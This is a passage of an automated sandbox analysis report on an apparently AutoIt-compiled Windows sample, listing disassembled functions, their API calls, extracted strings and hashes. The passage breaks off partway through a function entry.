GetClassNameW.USER32(00000018,?,00000400), ref: 0045B055
_wcscmp.LIBCMT ref: 0045B065
GetClassNameW.USER32(00000010,?,00000400), ref: 0045B08D
GetWindowRect.USER32(00000004,?), ref: 0045B0F6

Strings

@, xrefs: 0045AEF9
ThumbnailClass, xrefs: 0045AFE0, 0045B060

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
String ID: @$ThumbnailClass
API String ID: 1788623398-1539354611
Opcode ID: 669bc5d2a5c452374ee22981f9444d8d68a805a8765a871b1b4bd50104187170
Instruction ID: 2113ca19c953e4d0fb0a3bed3b629d6a09082ecb25fab152276a3acc7fd757eb
Opcode Fuzzy Hash: 669bc5d2a5c452374ee22981f9444d8d68a805a8765a871b1b4bd50104187170
Instruction Fuzzy Hash: BD81CF711082059BDB00DF11C881BAB77E8EF4075AF14856FFD859A192DB38DD4DCBAA

Function 0048C5FE Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623

DragQueryPoint.SHELL32(?,?), ref: 0048C627

Part of subcall function 0048AB37: ClientToScreen.USER32(?,?), ref: 0048AB60
Part of subcall function 0048AB37: GetWindowRect.USER32(?,?), ref: 0048ABD6
Part of subcall function 0048AB37: PtInRect.USER32(?,?,0048C014), ref: 0048ABE6

SendMessageW.USER32(?,000000B0,?,?), ref: 0048C690
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0048C69B
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0048C6BE
_wcscat.LIBCMT ref: 0048C6EE
SendMessageW.USER32(?,000000C2,00000001,?), ref: 0048C705
SendMessageW.USER32(?,000000B0,?,?), ref: 0048C71E
SendMessageW.USER32(?,000000B1,?,?), ref: 0048C735
SendMessageW.USER32(?,000000B1,?,?), ref: 0048C757
DragFinish.SHELL32(?), ref: 0048C75E
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0048C851

Strings

@GUI_DROPID, xrefs: 0048C77E
@GUI_DRAGFILE, xrefs: 0048C800
@GUI_DRAGID, xrefs: 0048C7C9
pD, xrefs: 0048C79B

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$pD
API String ID: 169749273-2933262381
Opcode ID: fe787714386ed1c3ddd4163c3f5535821c598f5dfa6e15062804bbb5d4f1b538
Instruction ID: 4fadb8ae9d86136d60326728fb0320be203031e120dd753c2ba31efb77555f42
Opcode Fuzzy Hash: fe787714386ed1c3ddd4163c3f5535821c598f5dfa6e15062804bbb5d4f1b538
Instruction Fuzzy Hash: 1B617F71108300AFC701EF65CC85D9FBBE8EF88714F50092EF591A22A1DB74A949CB6A

Function 0045ABD4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 0045AC33

Strings

[ACTIVE, xrefs: 0045AC20
[LAST, xrefs: 0045ACE0
ACTIVE, xrefs: 0045AC0E
[CLASS:, xrefs: 0045AC83
HANDLE=, xrefs: 0045AC2C
LAST, xrefs: 0045ABF8
CLASSNAME=, xrefs: 0045AC70
[HANDLE:, xrefs: 0045AC3F
[REGEXPTITLE:, xrefs: 0045AC5B
REGEXP=, xrefs: 0045AC48
[ALL, xrefs: 0045ACD9
ALL, xrefs: 0045ACC7

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: __wcsnicmp
String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
API String ID: 1038674560-1810252412
Opcode ID: a4b87119f2590ef0ff3b3c98b7eb3c6a6e3570d121fdce2df4e859d34895fad6
Instruction ID: cc55e2bc6580523fe6938d14c256d65c14dee3a36fa7a852f9c3cef8ae364549
Opcode Fuzzy Hash: a4b87119f2590ef0ff3b3c98b7eb3c6a6e3570d121fdce2df4e859d34895fad6
Instruction Fuzzy Hash: 2C31A370A48209AADB01EA61DE43FEE7774AF14719F60052FB801711D2EB6D6F18C56E

Function 00474FFD Relevance: 25.6, APIs: 17, Instructions: 110COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F8A), ref: 00475013
LoadCursorW.USER32(00000000,00007F00), ref: 0047501E
LoadCursorW.USER32(00000000,00007F03), ref: 00475029
LoadCursorW.USER32(00000000,00007F8B), ref: 00475034
LoadCursorW.USER32(00000000,00007F01), ref: 0047503F
LoadCursorW.USER32(00000000,00007F81), ref: 0047504A
LoadCursorW.USER32(00000000,00007F88), ref: 00475055
LoadCursorW.USER32(00000000,00007F80), ref: 00475060
LoadCursorW.USER32(00000000,00007F86), ref: 0047506B
LoadCursorW.USER32(00000000,00007F83), ref: 00475076
LoadCursorW.USER32(00000000,00007F85), ref: 00475081
LoadCursorW.USER32(00000000,00007F82), ref: 0047508C
LoadCursorW.USER32(00000000,00007F84), ref: 00475097
LoadCursorW.USER32(00000000,00007F04), ref: 004750A2
LoadCursorW.USER32(00000000,00007F02), ref: 004750AD
LoadCursorW.USER32(00000000,00007F89), ref: 004750B8
GetCursorInfo.USER32(?), ref: 004750C8

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: Cursor$Load$Info
String ID:
API String ID: 2577412497-0
Opcode ID: fe88967af424c1f4c9ae994d1dca842c12f2ee5cef9159fe2d10a3b622c76547
Instruction ID: d5c7a2001707235dd9e126089dd3671015cbda4ea0a9ffae781a460d29ca5a6d
Opcode Fuzzy Hash: fe88967af424c1f4c9ae994d1dca842c12f2ee5cef9159fe2d10a3b622c76547
Instruction Fuzzy Hash: 7F3114B1D083196ADF109FB68C8999FBFE8FF04750F50453BA50DEB281DA7865048F95

Function 0048A1B9 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0048A259
DestroyWindow.USER32(?,?), ref: 0048A2D3

Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0048A34D
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0048A36F
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0048A382
DestroyWindow.USER32(00000000), ref: 0048A3A4
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0048A3DB
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0048A3F4
GetDesktopWindow.USER32 ref: 0048A40D
GetWindowRect.USER32(00000000), ref: 0048A414
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0048A42C
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0048A444

Part of subcall function 004025DB: GetWindowLongW.USER32(?,000000EB), ref: 004025EC

Strings

0, xrefs: 0048A26F
tooltips_class32, xrefs: 0048A346, 0048A3D4

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
String ID: 0$tooltips_class32
API String ID: 1297703922-3619404913
Opcode ID: ad7f984ea1cd4845daa69472354c2a8f15b860bce95c98789d10b07fca09f9c0
Instruction ID: 021702ee8d535e162beb7c83f4b22bae82635ac61efe1e234d944cc96a30802f
Opcode Fuzzy Hash: ad7f984ea1cd4845daa69472354c2a8f15b860bce95c98789d10b07fca09f9c0
Instruction Fuzzy Hash: CE719270141204AFE721DF18CC49F6B77E5FB88704F04492EF985972A0D7B8E956CB6A

Function 00484392 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00484424
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0048446F

Strings

EXISTS, xrefs: 004844D8
EXPAND, xrefs: 00484521
ISCHECKED, xrefs: 004845F2
UNCHECK, xrefs: 0048464B
CHECK, xrefs: 0048448F
SELECT, xrefs: 00484620
COLLAPSE, xrefs: 004844B5
GETSELECTED, xrefs: 0048457F
GETITEMCOUNT, xrefs: 00484551
GETTEXT, xrefs: 004845C2
GETTOTALCOUNT, xrefs: 00484456

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 3974292440-4258414348
Opcode ID: d41169d53101f6065c28c3bc0dfba1111c846f283bff3c510c83ccf8dd002daa
Instruction ID: 284482c989e2c3ea33895925bad2fd62e2b6eb619b8524f2c72ddc2562c3458e
Opcode Fuzzy Hash: d41169d53101f6065c28c3bc0dfba1111c846f283bff3c510c83ccf8dd002daa
Instruction Fuzzy Hash: BF917F712043119BCB04FF11C451A6EB7E1AF95358F44886EF8966B3A3DB38ED0ACB59

Function 0046A352 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC

CharLowerBuffW.USER32(?,?), ref: 0046A3CB
GetDriveTypeW.KERNEL32 ref: 0046A418
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0046A460
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0046A497
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0046A4C5

Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06

Strings

open , xrefs: 0046A427
closed, xrefs: 0046A3DF, 0046A3E8
close cd wait, xrefs: 0046A4B0
set cd door , xrefs: 0046A466
type cdaudio alias cd wait, xrefs: 0046A443
close, xrefs: 0046A3D1
wait, xrefs: 0046A482
open, xrefs: 0046A3F2

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 2698844021-4113822522
Opcode ID: 2433a39104dc5ffff93c95c3229acd57be7374fc48d04d6dc4c903e6b3cf77a9
Instruction ID: 3713139b98a23bb0435d921a878e050fdb512fde8566727adc807e41ed5eba46
Opcode Fuzzy Hash: 2433a39104dc5ffff93c95c3229acd57be7374fc48d04d6dc4c903e6b3cf77a9
Instruction Fuzzy Hash: F7515EB15146049FC700EF11C88196BB7E8EF94718F10886EF89967292DB39ED0ACF5A

Function 0048C1AC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0048C1FC
GetFocus.USER32 ref: 0048C20C
GetDlgCtrlID.USER32(00000000), ref: 0048C217
_memset.LIBCMT ref: 0048C342
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0048C36D
GetMenuItemCount.USER32(?), ref: 0048C38D
GetMenuItemID.USER32(?,00000000), ref: 0048C3A0
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0048C3D4
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0048C41C
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0048C454
DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0048C489

Strings

0, xrefs: 0048C33A

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
String ID: 0
API String ID: 1296962147-4108050209
Opcode ID: 8f0d72dde9b3b2f8007c5173964acd19ac7deeb98eb41cbfe34375d072a7c703
Instruction ID: c475bcefc4ba02209658d373736a3052ec3262963195f5d7aee57ef1aaf8ece4
Opcode Fuzzy Hash: 8f0d72dde9b3b2f8007c5173964acd19ac7deeb98eb41cbfe34375d072a7c703
Instruction Fuzzy Hash: 17818870608301AFD710EF24D894A7FBBE8EB88714F004D2EF99597291D778D945CBAA

Function 0047731A Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 0047738F
CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 0047739B
CreateCompatibleDC.GDI32(?), ref: 004773A7
SelectObject.GDI32(00000000,?), ref: 004773B4
StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00477408
GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00477444
GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00477468
SelectObject.GDI32(00000006,?), ref: 00477470
DeleteObject.GDI32(?), ref: 00477479
DeleteDC.GDI32(00000006), ref: 00477480
ReleaseDC.USER32(00000000,?), ref: 0047748B

Strings

(, xrefs: 00477410

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: c5cc789c95bc938fc9aea6b12f7cc4ce38ae9c4c09b60207eefc23fc12c0c4d9
Instruction ID: dfe8a3419fea5eebfe22a8fe4a62b6ec684acb784746aa6277c3acce6f7982dd
Opcode Fuzzy Hash: c5cc789c95bc938fc9aea6b12f7cc4ce38ae9c4c09b60207eefc23fc12c0c4d9
Instruction Fuzzy Hash: 5D515871904209EFCB14CFA8CC84EAFBBB9EF49310F14852EF959A7211D735A945CB54

Function 00406A8C Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON

Download Yara Rule

APIs

Part of subcall function 00420957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00406B0C,?,00008000), ref: 00420973

Part of subcall function 00404750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00404743,?,?,004037AE,?), ref: 00404770

SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00406BAD
SetCurrentDirectoryW.KERNEL32(?), ref: 00406CFA

Part of subcall function 0040586D: _wcscpy.LIBCMT ref: 004058A5

Part of subcall function 0042363D: _iswctype.LIBCMT ref: 00423645

Strings

Unterminated string, xrefs: 0043E7E4
>>>AUTOIT SCRIPT<<<, xrefs: 0043E496
#include depth exceeded. Make sure there are no recursive includes, xrefs: 0043E421
EA06, xrefs: 0043E452
Bad directive syntax error, xrefs: 0043E79D
Error opening the file, xrefs: 0043E43D, 0043E4B8
AU3!, xrefs: 00406B61

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 537147316-1018226102
Opcode ID: 617069094f817d23c4a39293313dabc7ec73f7d5ca1b4cb255023a1e9a2a01d6
Instruction ID: 136c1bde332718f4234bbb9892b60201bfb37e26dd96c6a9a3310cb901d73b7e
Opcode Fuzzy Hash: 617069094f817d23c4a39293313dabc7ec73f7d5ca1b4cb255023a1e9a2a01d6
Instruction Fuzzy Hash: 2C027D701083419FC714EF25C8419AFBBE5EF98318F54492FF486A72A2DB38D949CB5A

Function 00462D36 Relevance: 19.7, APIs: 13, Instructions: 214windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00462D50
GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00462DDD
GetMenuItemCount.USER32(004C5890), ref: 00462E66
DeleteMenu.USER32(004C5890,00000005,00000000,000000F5,?,?), ref: 00462EF6
DeleteMenu.USER32(004C5890,00000004,00000000), ref: 00462EFE
DeleteMenu.USER32(004C5890,00000006,00000000), ref: 00462F06
DeleteMenu.USER32(004C5890,00000003,00000000), ref: 00462F0E
GetMenuItemCount.USER32(004C5890), ref: 00462F16
SetMenuItemInfoW.USER32(004C5890,00000004,00000000,00000030), ref: 00462F4C
GetCursorPos.USER32(?), ref: 00462F56
SetForegroundWindow.USER32(00000000), ref: 00462F5F
TrackPopupMenuEx.USER32(004C5890,00000000,?,00000000,00000000,00000000), ref: 00462F72
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00462F7E

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
String ID:
API String ID: 3993528054-0
Opcode ID: 68d6ff921564c39c8709aecc737d134abe6a2587159ab4d14f70d8f79111516a
Instruction ID: dec7b0e441c84a99d0ab23afc077d39fee676e6f9a2472c44709d087c22ecc3a
Opcode Fuzzy Hash: 68d6ff921564c39c8709aecc737d134abe6a2587159ab4d14f70d8f79111516a
Instruction Fuzzy Hash: AB71F670601A05BBEB219F54DD49FAABF64FF04314F10022BF615AA2E1D7FA5C10DB5A

Function 00B924FF Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 00B92543

Part of subcall function 00B93073: _free.LIBCMT ref: 00B93090
Part of subcall function 00B93073: _free.LIBCMT ref: 00B930A2
Part of subcall function 00B93073: _free.LIBCMT ref: 00B930B4
Part of subcall function 00B93073: _free.LIBCMT ref: 00B930C6
Part of subcall function 00B93073: _free.LIBCMT ref: 00B930D8
Part of subcall function 00B93073: _free.LIBCMT ref: 00B930EA
Part of subcall function 00B93073: _free.LIBCMT ref: 00B930FC
Part of subcall function 00B93073: _free.LIBCMT ref: 00B9310E
Part of subcall function 00B93073: _free.LIBCMT ref: 00B93120
Part of subcall function 00B93073: _free.LIBCMT ref: 00B93132
Part of subcall function 00B93073: _free.LIBCMT ref: 00B93144
Part of subcall function 00B93073: _free.LIBCMT ref: 00B93156
Part of subcall function 00B93073: _free.LIBCMT ref: 00B93168

_free.LIBCMT ref: 00B92538

Part of subcall function 00B92096: HeapFree.KERNEL32(00000000,00000000,?,00B93208,?,00000000,?,00000000,?,00B9322F,?,00000007,?,?,00B92697,?), ref: 00B920AC
Part of subcall function 00B92096: GetLastError.KERNEL32(?,?,00B93208,?,00000000,?,00000000,?,00B9322F,?,00000007,?,?,00B92697,?,?), ref: 00B920BE

_free.LIBCMT ref: 00B9255A
_free.LIBCMT ref: 00B9256F
_free.LIBCMT ref: 00B9257A
_free.LIBCMT ref: 00B9259C
_free.LIBCMT ref: 00B925AF
_free.LIBCMT ref: 00B925BD
_free.LIBCMT ref: 00B925C8
_free.LIBCMT ref: 00B92600
_free.LIBCMT ref: 00B92607
_free.LIBCMT ref: 00B92624
_free.LIBCMT ref: 00B9263C

Memory Dump Source

Source File: 00000000.00000002.2247376463.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_uG3I84bQEr.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 89670cf6627992ebe7301b1e63c104efdde0352742129af88144f8f53acfed13
Instruction ID: 373099339e01d50b25471c2bcaf3f8a1cc1dd8df09614ad36802cc04055c6d11
Opcode Fuzzy Hash: 89670cf6627992ebe7301b1e63c104efdde0352742129af88144f8f53acfed13
Instruction Fuzzy Hash: 35310772E00305ABEF31AB79D846B56B3E9FB10351F1544B9E49AD6162DA71A980CB20

Function 004788AB Relevance: 19.6, APIs: 10, Strings: 1, Instructions: 324fileCOMMON

Download Yara Rule

APIs

